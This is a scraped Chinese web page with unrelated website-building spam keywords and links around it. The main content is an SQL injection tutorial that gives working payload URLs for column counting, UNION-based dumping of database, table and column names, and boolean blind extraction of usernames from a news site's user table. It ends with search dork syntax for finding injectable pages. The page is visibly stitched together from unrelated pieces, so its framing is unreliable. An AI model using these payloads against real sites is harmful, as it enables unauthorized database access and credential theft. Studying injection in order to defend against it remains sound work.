当前位置: 首页 > news >正文

公司门户网站怎么做国外哪个网站专做展厅

公司门户网站怎么做,国外哪个网站专做展厅,wordpress 调用指定文章,dw做网站一、SQL注入分类 SQL注入根据攻击方式的不同,可以分为以下几种类型: 数字型注入字符型注入报错注入布尔盲注时间盲注联合查询注入基于堆叠的查询注入 二、SQL注入流程 发现注入点猜测字段数确定显示字段获取数据库信息获取数据库中的表获取表中的字段获…

一、SQL注入分类

SQL注入根据攻击方式的不同,可以分为以下几种类型:

  1. 数字型注入
  2. 字符型注入
  3. 报错注入
  4. 布尔盲注
  5. 时间盲注
  6. 联合查询注入
  7. 基于堆叠的查询注入

二、SQL注入流程

  1. 发现注入点
  2. 猜测字段数
  3. 确定显示字段
  4. 获取数据库信息
  5. 获取数据库中的表
  6. 获取表中的字段
  7. 获取字段中的数据
例子:

获取数据库名参考

  1. 字符限制:数据库的名字可以包含字母、数字、下划线和美元符号($)。但是,名字不能以数字开头。

  2. 大小写敏感性:在Windows系统上,MySQL数据库的名字默认是不区分大小写的。但在大多数Unix/Linux系统上,数据库的名字是区分大小写的。为了确保跨平台的兼容性,建议使用小写字母。

  3. 长度限制:数据库的名字最大长度为64个字符。

1.发现网站请求为get,如果存在注入点这里不会报错
http://192.168.10.111/news/show.php?id=-1 and 1=12.发现注入点后猜字段,逐一尝试猜测字段数
http://192.168.10.111/news/show.php?id=-1 order by 16
-- order by x 根据第x个字段排序,如果出现报错说明字段不存在3.发现不报错出现,并且出现的数值,为显示字段
http://192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,154.脱库
//获取当前数据库
http://192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15//获取数据库中的表,hex的作用是因为拼接后的字符串有‘,’会混淆
192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,
hex(group_concat(table_name))
,12,13,14,15 from information_schema.tables where table_schema='news'//获取表中的字段
192.168.10.111/news/show.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,
hex(group_concat(column_name))
,12,13,14,15 from information_schema.columns where table_schema='news' and table_name='news_users

三、sql盲注:

构造真或者假的问题对数据库进行提问

寻找sql注入点

1.在url后添加   ’  如果报错说明有注入点

2.对数值型注入点可以进行减法

3.对在url后添加   and 1=2   如果没有正常显示,说明有注入点

例子:
-- 猜测数据库长度
http://192.168.10.111/news/show.php?id=46 and length(database())=4-- 或取当前数据库第二个字符
http://192.168.10.111/news/show.php?id=46 and substr(database(),2,1)='e'-- 获取news数据库中所有表名长度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(table_name) 
from information_schema.tables where table_schema='news'))=98-- 获取表名字符串第一个字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(table_name) 
from information_schema.tables where table_schema='news'),1,1)='n'-- 获取news库,news_users表中字段字符串的字符串长度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(column_name) 
from information_schema.columns where table_schema='news' and table_name='news_users'))=24-- 获取字段第一个字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(column_name) 
from information_schema.columns where table_schema='news' and table_name='news_users'),1,1)='u'-- 获取username字段中的信息长度
http://192.168.10.111/news/show.php?id=46 and length((select group_concat(username) from 
news.news_users))=5-- 获取username字段的字符
http://192.168.10.111/news/show.php?id=46 and substr((select group_concat(username) fromnews.news_users),2,1)='d'

 

注:查找网站资源可使用hacking语法

inurl:?id=                url中存在:?id=

Intitle:admin            title中存在:admin

filetype:txt                查找网站中txt文件

site:www.baidu.com 在百度中查找

http://www.yayakq.cn/news/788005/

相关文章:

  • 网站建设丶金手指花总13商务咨询公司网站制作模板
  • 做网站要空间还是服务器网站维护主要做什么
  • 做医疗科普的网站免费的html代码模板
  • 做文字图片的网站外贸网站示例
  • 推广网站的作用wordpress实现会员中心
  • 学会网站建设方案外贸做网站的好处
  • 网站运营是什么岗位网上购物网站建设的实训报告
  • 郑州企业网站开发企业网站模板建设
  • 富阳网站建设公司公司简单网站多少钱
  • 襄阳蒂凯网络网站建设小程序全自动建站系统
  • 网站建设模板简单ico加网站
  • 青岛网站建设服务品牌展示型网站源码
  • 深圳企业网站建设优惠免费咨询医生在哪里咨询
  • 做公司网站有什么需要注意的某购物网站建设方案
  • 天津制作网站的公司电话设计软件cad
  • 重庆网站建设解决方案wordpress 可以做什么
  • seo站长教程成都模板网站建设服务
  • 柳州企业网站建设价格织梦php网站
  • 公司建设的网站属于无形资产吗四川建设厅电话网站
  • 建设网站注意wordpress 自定义链接
  • 高端品牌网站建设有哪些网站seo方法
  • 如何看到网站的制作公司如何利用网络进行推广和宣传
  • 做服装微商城网站网页制作作品
  • 深圳市建设科技促进中心网站wordpress评论框
  • 现在做网站一般做多宽网络宣传平台
  • 关于企业网站建设的建议设计比例网站
  • 网页的网站导航怎么做wordpress wp 缺点
  • 更改网站名称做影视后期有哪些资源网站
  • 广东省建设监理协会网站 首页一个虚拟主机做2个网站
  • 怎样做医院网站网站开发团队 需要哪些角色